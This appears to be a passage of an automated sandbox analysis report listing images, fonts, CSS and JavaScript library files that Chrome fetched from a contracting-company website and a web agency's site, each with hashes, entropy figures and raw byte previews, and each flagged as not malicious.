                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):24323
                                              Entropy (8bit):7.841875536958953
                                              Encrypted:false
                                              SSDEEP:384:4YNg7S6xa/mbs/Rb1ctrrAjriwjNtZt8/Wv0ux/DYx/5qwpqrO5:4Yyk1ctrCptZtFMu5o0wMrG
                                              MD5:FAF53F987F3D160321D94AF64B10657A
                                              SHA1:368DDF52AE07D921E4E0D576133A4440079AC5F6
                                              SHA-256:94996E91491ACB62063C4BE3AFF23761C75FC5FDEBA354E4A75743970B8A3635
                                              SHA-512:639A996AE59D3325C4346333E4D2494F6F9D6C48D590F1D5339BFC9CFC89EBC7F0D3492512C3CF4148E8C2ED217BB15D4E97D1851D853757A435350FC95CEA5A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:dropped
                                              Size (bytes):74953
                                              Entropy (8bit):7.974604668220894
                                              Encrypted:false
                                              SSDEEP:1536:flKpxwFbl3MT/OXZmvmUfNAB6oVCabCHvTWrIyhW8Jk+6XujS2IsOfnN:sEFbKT/OXOABnVPbCP+jhHeXGHryN
                                              MD5:136E7A62F2A4E9FDBCF5790DBF0694CF
                                              SHA1:5AF3462B13491D943344DC840E766C0EF77F2EB7
                                              SHA-256:CC3156924F9E17AF6B8E8887FC6BEFB9BF8BBA22B3EA8F7CACB51DA00A01BC02
                                              SHA-512:9D6A810F5C6BE0D3F0233B1E6BFDBFD64DC37EC71EFCB392E726811EABFE54388FA8567AF360230EBFAF13A3097E4BA5942E45A15B5D7345BAFD8B821229575F
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:5AC65268934111EDBE40BFEA44351D52" xmpMM:DocumentID="xmp.did:5AC65269934111EDBE40BFEA44351D52"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5AC65266934111EDBE40BFEA44351D52" stRef:documentID="xmp.did:5AC65267934111EDBE40BFEA44351D52"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............5-...d..$...........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):16845
                                              Entropy (8bit):7.7395172000708
                                              Encrypted:false
                                              SSDEEP:384:4YNg7iCheCXzgqpv18EjVzEEh0V6rSj4IdfEHMbWtMl:4YyjeqZeIdhW6rQVqMRl
                                              MD5:8D5486739B79031EBFF51E6F7904E566
                                              SHA1:B3E60D959BBF983B427709258E62C9FE1717FDFD
                                              SHA-256:BC957A25E11B36C7623C5BB08B0C84A7AE033A7ECC9491F595B32225850A4A5D
                                              SHA-512:B0EF881F1C697111FF20ECC00125E1B3C22663C117AA96B2636A3CB0399EBBD6797FE637A691EA3A0F3A55FA49E1A5225026F204B074DF162CEC14F942BBF1E7
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):27366
                                              Entropy (8bit):7.859620931902841
                                              Encrypted:false
                                              SSDEEP:768:poIPONmgetaZRFgyFE6tIlTzaa/ICYhBG9Sf7HM1dh:6IPz/taZR+yFEHlTmdpjK8Hq
                                              MD5:1AE6FC2C1CA16F13A0B3DA73893DB593
                                              SHA1:F5299BDE5A8CC6DDF94F638C3E595C0A8C009B0D
                                              SHA-256:DB6C4391C6F5432B683302DD5730B07FAA0D761ED1A337EFD7712D915ECEF82C
                                              SHA-512:BC17C33404AD53BFEB7D6360E5C90432AA288810F446BE914E7BC27BE2DDBF0B2D4694B6961309320972D28B45E75BB46FE5D927E1BDE3B4966CAE5ECB0AA133
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/7/5e07aca7ac8c83df08eeb434753dbfeb.jpg
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:3CE58371925F11EDB3CE8B30C952F823" xmpMM:DocumentID="xmp.did:3CE58372925F11EDB3CE8B30C952F823"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3CE5836F925F11EDB3CE8B30C952F823" stRef:documentID="xmp.did:3CE58370925F11EDB3CE8B30C952F823"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d................&..?...T...j.................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1500, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):179168
                                              Entropy (8bit):7.998358964532671
                                              Encrypted:true
                                              SSDEEP:3072:51uNcRT2QHwOqS/N3d33v0/KLl7e9SLl6w2AbWxnwQXcl9lvJh+/tXlTgD:51dXN3d3/Mr9SLpbWhwXl+ZlA
                                              MD5:08779BD2B16D7DF0E041D2D76A0169BB
                                              SHA1:A6682628A59E03FCE85F6DAD018152C678BC6700
                                              SHA-256:2D99DCE3B5F2B01CDB172B314586ED672A00E21589DF6FA992B557585851BA88
                                              SHA-512:55C9B4AA7EC88809BE62C7F3A84EFFB3009193F640C3206CCF0B80D40FB54DF586224BB9EE318AE8533C19ECC6666ABD0EED3346AA04693B8D2E836CBA297AA9
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/portfolio/cdc.webp
                                              Preview:RIFF...WEBPVP8 ....V...*....>Q&.F..!."2.....gn.{C4...wl.T.....^y_.........a....]..../..:..._.O.['......?......y.zq.....;.|..._.O.y.r...r..~B|'..3.e...o..f...o}..G.E................|7...{.......>._..{z..z.z..b............}..V.._...........l..~..o...?................?....q.g.......W.......?...._.'...?,~E.,...3...7....._......[........_.............../......o........k.#.3.G./...w..........'...................?...}<.........?.?............O...?..........?-~...U..Vg.q.U...r..ft...j.....P..S..c....=...$e.t.y#1..........S.c....bAXau.(...J......T_....aQ~L*/.E.0..&......=\..A.;+...C).),4'S5>.c.bSG. ...)Yda..W.:.m /......G..xv..(....h.]4...e..."2..F[....9..."2..F[...c..lq.r.Z...6$98.@.5.xB.B..V..a.....t.=.GX..E... ..uY....~.....p...~vY.lr#)...k>p.F[...c..lr#-.De.....P.d.._.X..A..U..c..\S.C!..1N..h.!.#c)dgz.#o...[.B..7.. ..HB.z.......&...}..@!r.......R.7.@..H..... .8.....P....fY."2....7..n.0P.$..9..A.....1..pUE.Y`..c...y\f;~.`%...f.&.....*/.E.V&..T_....aQ~L
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):13073
                                              Entropy (8bit):7.607193278682108
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwnlAd1s5K3Hx+hpuvi/Sy0zyuV4LuZnztjYUcQduoCKVJgefD+OTq:4YNg7nl55K3z6K9y3uZzzJVJTTq
                                              MD5:A5AD2A8B32450FEC36176E99EFFEA424
                                              SHA1:EE7BA4EDFBAEEC93FC196305F4FF76E9ECD77909
                                              SHA-256:15840E398D7E369F6D408920572461433C9F457D3B5A90E60DE651C626C47FB3
                                              SHA-512:B732D95A2F428FD7689E540B82F93E4BCE69959120661032EBDD4570A643FE10E66A6B0C2B504208A1CE5799E6C0163AB5235EE3ECE34B87C094F2264E121C75
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 150020, version 772.1280
                                              Category:downloaded
                                              Size (bytes):150020
                                              Entropy (8bit):7.99708187417653
                                              Encrypted:true
                                              SSDEEP:3072:vPtxURbSTtDXSLXe0itudYTPEnus4blfNUqKrC7ZOBS9C3bzlLX4/NKOTD5:P15Die0UPblfNUqLZg9I/Qk5
                                              MD5:D5E647388E2415268B700D3DF2E30A0D
                                              SHA1:97F0942C6627DDD89FB62170E5CAC9A2CBD6C98C
                                              SHA-256:886C86112A804EF1DDD1CB206AF4C8C40E34B73C26652CA231404AA35A6B30D9
                                              SHA-512:50B2FFD7537D0424286936CB7BA566004A664F447E4AAAC8FA40CEB2850EAD6CDB39C957515AE05A07AAEB8F6E3E428C4B95E4EFA3EDCADC9473E9E200BB47D6
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/webfonts/fa-solid-900.woff2
                                              Preview:wOF2......J........0..I..........................8.$. .`..<......D.@..p. .....Dp....z.aD.f.O.=i.x.TUUU....l........g...o~..?..o...........O......l...x}~........!.@/*..U.....>.........{;m.B..w.@^Q^.Z...f ........t....7....`..Lr.......P.B.Jx....J.0).K.T;S........ODg..>@If3..{.7..#.?..t.n'.M...@F....D..S..Gz}.0$.X..D....p5.vw......y.......O8.....F..,i..q.X...$.+..&.4^*....P.x...=....G..b. .1....d....V.u+...;WwMw.L.LwOMuM....Zi.w.[y..!.I.5Y..!.l.....6^..".q.`.:c^.8<..6..^...yK.sK}..f..y;.f....].V;r.d[..M.la/.X6M.q...N.]...fH%.X .t'.?..%....H..?<.:.}(...#.....Jp...2\*@...*.0.)*d....d.j.CM.B.!K...p.a.*...".@.(.6 ......|............1.S..;...'2..2VjC{RFX.;8aG.ZG....._....'......:....<_6.....\..d.h.....7.....Z.2MAT4I.$.....o...~..".sV.......h..^...&4)........!...!).<..n.Na%R.....h.p...KM.h..[.z_.CX zoF..H`.2(U.S.v...;m.UvjA...T........^........._... ....G......2..9L=...s...{........A0w...=.s.......=3w...@w. ...Y......rE.l.Ze...G.....X......A..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):11214
                                              Entropy (8bit):7.529455167459989
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwOk86JWJp+y67ZobKIrcMzE81TVH0Ll9qoMNgQUh/cF2:4YNg7mfey6ubrzMzti2
                                              MD5:1E91544DBD43C40539F1289DEC0882F7
                                              SHA1:DC94EE82CCF49A461A440817927A008504629DFA
                                              SHA-256:0495DD115904A13C3B6C266544755E21CEC3493A01C1B5A42813AE59C986FAC8
                                              SHA-512:8466E3955E4E7C011F47BAC852C1124A97C194F30C6F7C710D222A28437A620BCDA022EB90176A780F206D24983A77C903B4A20FDF01EBBAFBF6D8016D557FBE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/43/a2060cdc72bc37dc1dd7b813888aa9fd.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):14131
                                              Entropy (8bit):7.648930759510245
                                              Encrypted:false
                                              SSDEEP:384:4YNg7FGEDmdqmxeyie/ZkW/TRbyuHw9fX6QfZ:4YyMGMqWezmZkOGuHwFpfZ
                                              MD5:37409769D95D1DC52DED73E501110DCC
                                              SHA1:8A40DE9D0DEB7F02BC178BD6A67BB81A379898EE
                                              SHA-256:A6A4BC10406CF46CE0F7FEC6DC43E13088447E5BEB0C8DB00A40B958AADF4BC4
                                              SHA-512:0637E59E991E09E44BE3E0B5CE340CA95936E252E8F9BCEF326AB092EB2E783FB2D100D8D76E7BFD3F1F2B83295119CEC20CC2CCE873AEFB3B73BE4AC5A3BA6D
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):15206
                                              Entropy (8bit):7.68492686735954
                                              Encrypted:false
                                              SSDEEP:384:4YNg7TdjHezVeemqkL/seiCrcMleZ3sqD:4YyfdjHeMxq1VCoMlMD
                                              MD5:F1306B0DB626A307B99BD6B671CA6718
                                              SHA1:4AD26CDDAC7BEE558EB21AB6E05030D30755CDF1
                                              SHA-256:652C25C90AD8DD8F712E94F354380889161ED993EBB4AE06E1433CF8F64BF0FA
                                              SHA-512:F7FDCD31474A9A4EA14E15A61679D9D2EAAE72350BB1070E5246E4814EBD8A4D7270A32FFD03434F9874C6DC58E112A47B2E2ABFB79FEC536C6058B68E6E27F8
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/64/a4679fa3559f0b5486593d4280af8974.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (32019)
                                              Category:dropped
                                              Size (bytes):35445
                                              Entropy (8bit):5.082186391611322
                                              Encrypted:false
                                              SSDEEP:768:LAyxsGKyc1gfflZVP4eAnmc6FumKSshD6cD6GLQfq9SvDz2A1Fxt:rxVKDSfJP4Nnmc6FuCshD6cD6xS9ODzV
                                              MD5:2AFCFF647ED260006FAA71C8E779E8D4
                                              SHA1:C4E5994F24EE8C8D2CF2D6602F0B56B9096A2E98
                                              SHA-256:081AE9BAAACC857C1C2CB51DE6DBD0E1EB811C2761EF01A50DF373F2F6EEFE22
                                              SHA-512:66AD813B1CA1BE74455EED3E584EA88E964B394DA3767A9BACCD61995746CF27826B50E03375F943803F22CF710352246D478377BEF9E5D34D23F3F349FD8F7B
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*!. * Isotope PACKAGED v3.0.6. *. * Licensed GPLv3 for open source use. * or Isotope Commercial License for commercial use. *. * https://isotope.metafizzy.co. * Copyright 2010-2018 Metafizzy. */..!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,s,a){function u(t,e,o){var n,s="$()."+i+'("'+e+'")';return t.each(function(t,u){var h=a.data(u,i);if(!h)return void r(i+" not initialized. Cannot call methods, i.e. "+s);var d=h[e];if(!d||"_"==e.charAt(0))return void r(s+" is not a valid method");var l=d.apply(h,o);n=void 0===n?l:n}),void 0!==n?n:t}function h(t,e){t.each(function(t,o){var n=a.data(o,i);n?(n.option(e),n._init()):(n=new s(o,e),a.data(o,i,n))})}a=a||e||t.jQuery,a&&(s.prototype.option||(s.prototype.option=function(t){a.isPlainObject(t)&&(this.optio
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):18550
                                              Entropy (8bit):7.76599249774262
                                              Encrypted:false
                                              SSDEEP:384:4YNg7Dt+uTsATMpkbaQjqiXuvbW1MXeRfSIqXmYJoCJfG5h/i:4YydxTFT4kbawqi+vi19dEXBOqG5h/i
                                              MD5:6956DC565A202F842A2D5F6783347F7A
                                              SHA1:A780A1559786089CF99B965F552AF6A2DB716C88
                                              SHA-256:15B582E72EBDCAC6059A726488F2A91D18728150EC076F8739701B7C6A96D621
                                              SHA-512:03496CE044F0AEB962CDEA267FCCE71B26861BC36E213F17E693C35A88D79F824067F1C20C2FBE703647AF97E47AF7795BBE59ECF722D14BD9E3286697AE1979
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):11765
                                              Entropy (8bit):7.556641638855572
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwi7uh061iztxTgsUX/petmLZkALuaRiGDF7csL:4YNg7i7A0pB5spDLZkwuSiGDFI6
                                              MD5:3813B9ED5A106BE86BF5602AC6F85014
                                              SHA1:E74907DCBE486924CEE187B67759B73B5A5CC717
                                              SHA-256:1A08469DB7A8219504FA882221D54F1DA499A713150B0F5C7CE25B807705A04E
                                              SHA-512:C7ED630A05FF28253A89F77F05E6239333E51F2FA03E37F95ED4ABD56172ACBA6CC78190DEBE21C8CEC406714BCE3EAD651E67587BE5B50A45A7711FB88D6736
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (14824)
                                              Category:downloaded
                                              Size (bytes):36899
                                              Entropy (8bit):5.108400326384852
                                              Encrypted:false
                                              SSDEEP:384:7oGWgFWKsFgF6UuF2/slZ3PH08JCNKUdFSpSiPs02huVgNV6gG5UCXfgWHfyXyz1:bWgFWKsFgFoF2g+G5U8fgWHRzSFtA
                                              MD5:0FBFFF0FD422FB0FD7CD8ED529539E64
                                              SHA1:094194C6627DF638956E1CC6846CC266E83BB341
                                              SHA-256:2E8D17109B570DAA8E7F86161A937169C41D95BEED43A3F37BBE970BC8D970A5
                                              SHA-512:22108DAE2319E12AC6D8965939DD2EF55EB649B73084DA76A939267D1985E2261C51F077FBB882362A6F1D685D7D6DC7C564D63080CB17F48E97806BC97890EE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/css/plugins.css
                                              Preview:@charset "utf-8";./* CSS Document */.....background-video { . bottom: 0;. left: 0;. overflow: hidden;. position: absolute;. right: 0;. top: 0;.}.video,.source {. bottom: 0;. left: 0;. min-height: 100%;. min-width: 100%;. position: absolute;.}..loaded .ytplayer-container {. display: block;.}..ytplayer-container {. bottom: 0;. height: 100%;. left: 0;. min-width: 100%;. overflow: hidden;. position: absolute;. right: 0;. top: 0;. z-index: 0;.} ..ytplayer-shield {. height: 100%;. left: 0;. position: absolute;. top: 0;. width: 100%;. z-index: 2;.}..ytplayer-player {. position: absolute;.}........./*! lightgallery - v1.2.13 - 2016-01-05.* http://sachinchoolur.github.io/lightGallery/.* Copyright (c) 2016 Sachin N; Licensed Apache 2.0 */.@font-face {. font-family: 'lg';. src: url("../fonts/lg.eot?n1z373");. src: url("../fonts/lg.eot?#iefixn1z373") format("embedded-opentype"), url("../fonts/lg.woff?n1z373") format("woff"), url("../fonts/lg.ttf?n1z373") format("true
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):102
                                              Entropy (8bit):4.921030304008144
                                              Encrypted:false
                                              SSDEEP:3:JSbMqSL1cdXWKQKzaXORdQzXWaee:PLKdXNQKGeOL
                                              MD5:59EE3965FCB16F88E9BDC20B9CD8612E
                                              SHA1:3D93A27E4DAC9DDA01DC5BBCCA9E1F53E827DAF2
                                              SHA-256:020A92F2FB27981D1398F916AE17400F8F11473962EBD858B7BF6901814EDD7B
                                              SHA-512:3E4C07D9CE3DEDE2998A59C32A3FE12D781AAE33C4AFE8D2B9B0D12C18EB96257373098497B5F3C909EC1EDE64FEB4B4074DBDB9678B4D6B019CD64360222849
                                              Malicious:false
                                              Reputation:low
                                              Preview:importScripts('https://www.gstatic.com/recaptcha/releases/xds0rzGrktR88uEZ2JUvdgOY/recaptcha__en.js');
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):6214
                                              Entropy (8bit):7.956233147740011
                                              Encrypted:false
                                              SSDEEP:96:3vOwtQZ2ipPFleort//yYGQrOAgpstO8ZW54J29XXOQtAb0mUNT7f5DR9Xl7pFf:/PQjxr0OrOVsNZW5cnXbdOf/jf
                                              MD5:FF0678D6C22399CD94C3E882FEA65524
                                              SHA1:94ABF0E2A9A90B78FE70A5BC6BA1DDC20469C086
                                              SHA-256:8D5C11A10CA82DF737DD52393175732A40DED91EACDDBE171DCAB835BAD9AA80
                                              SHA-512:DA1E4670F666781522D940A82ED89FBA5814BFCDA5DD48F40C73D565789678A7F34CB9A6EECBB6B7CF0EFD6B5CA55F3BEFB89B318360E6DEFD66E849E03326C4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/Omnichannel.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..................`...........m......._........m....................W..f....t........S..]..g...........@T.....u......d..i....\cv....W......b.......~............m.....h....n........\........l.....gu......M......j.._...........Z..|9..............ar...]........Z.........................................3......gs...."..........>B......v...JM.KbN......................u...w....'....s....U.e.................n....;...f...........bt......K.M...............~...e.....e,......IDATh...S.......3...;...."1...H...d.IE@AP"r..e..*...#Geukk.,[..nm....|.B.q...B.....wy.axI.A.k...:X....1b."....rB.s..G.|%..k.*..". ..#H.#8.,?.8.9...X.......C0@.....3ug.F.$.?G......G9X;X,j.....eJ%.b.z.H$..!.../ ...S.vum..Xy..84.......:J.C./s....5...X^...#..R..X..O..j?.....J.....B.8..l>....c$W.0...e8....v.....aD.z....o....wW.@.@.C".|a;.qkmo{X.p..)..$........5i....>]$.......7..^:...X...c.#r(].[L.]...zY.U ...Q..T..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JSON data
                                              Category:downloaded
